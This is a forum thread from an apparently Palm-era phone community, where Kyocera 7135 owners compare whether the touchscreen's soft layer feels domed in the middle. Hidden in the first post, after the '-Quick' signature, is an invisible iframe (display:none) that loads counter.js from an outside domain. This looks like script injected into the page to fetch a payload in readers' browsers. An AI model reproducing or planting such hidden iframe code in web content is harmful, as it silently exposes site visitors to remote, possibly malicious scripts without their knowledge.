+ Reply to Thread

Touch Screen "Raised up"?

Is this the case for everybody? On my phone the soft touchscreen layer seems to be slightly "domed" where it feels like its just off the glass lcd towards the center of the display. It feels much firmer towards the edges. Its consistent in that it gets firmer towards the edges to the same degree in any direction from the center. I'm used to a Plam Vx where the tactile feel of the screen was just slightly softer than glass and consistent anywhere on the display and graffiti area. On my 7135 the soft layer is definitely not flat on the surface of the lcd in the center of the screen. It functions just fine but its distracting during use and especially when "dragging" is required (like a slider on an app display).

-Quick<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

My feels the same across the screen, though slightly softer than my Plam Vx.

Hmmm... I've never noticed any difference throughout the surface of the silk screen myself.
    Please visit my picture site: Robert-O-Rama :)

db

i noticed the same

i noticed the same on my 7135, mostly when the light was right (or wrong). i was concerned that i would need to alter the stylus pressure in various places, but that doesn't seem to be the case as far as i can tell.
    -db

Re: i noticed the same

Originally posted by db
    i noticed the same on my 7135, mostly when the light was right (or wrong). i was concerned that i would need to alter the stylus pressure in various places, but that doesn't seem to be the case as far as i can tell.
    -db
    I can make a very distinct "dimple" pressing/tapping towards the middle of the screen. You can feel/hear the plastic(?) contacting and releasing from the lcd surface. As I said it doesn't effect the functionality (so far) but it is a bit unnerving. I am worried that if it is a manufacturing defect and not by design it might seriously effect the life of the touch screen. I guess I'll wait for a while and see. Maybe call Kyocera and see what they say. Maybe a bad batch of screens?

-Quick

Mine is the same way... especially on the graffiti area. I've been worried at times that I'm pressing too hard and that the stylus will go right through!

Mine seems uniformally flat all across the surface. Just lucky I guess.
    ~'kito
    pdaPhoneHome Moderator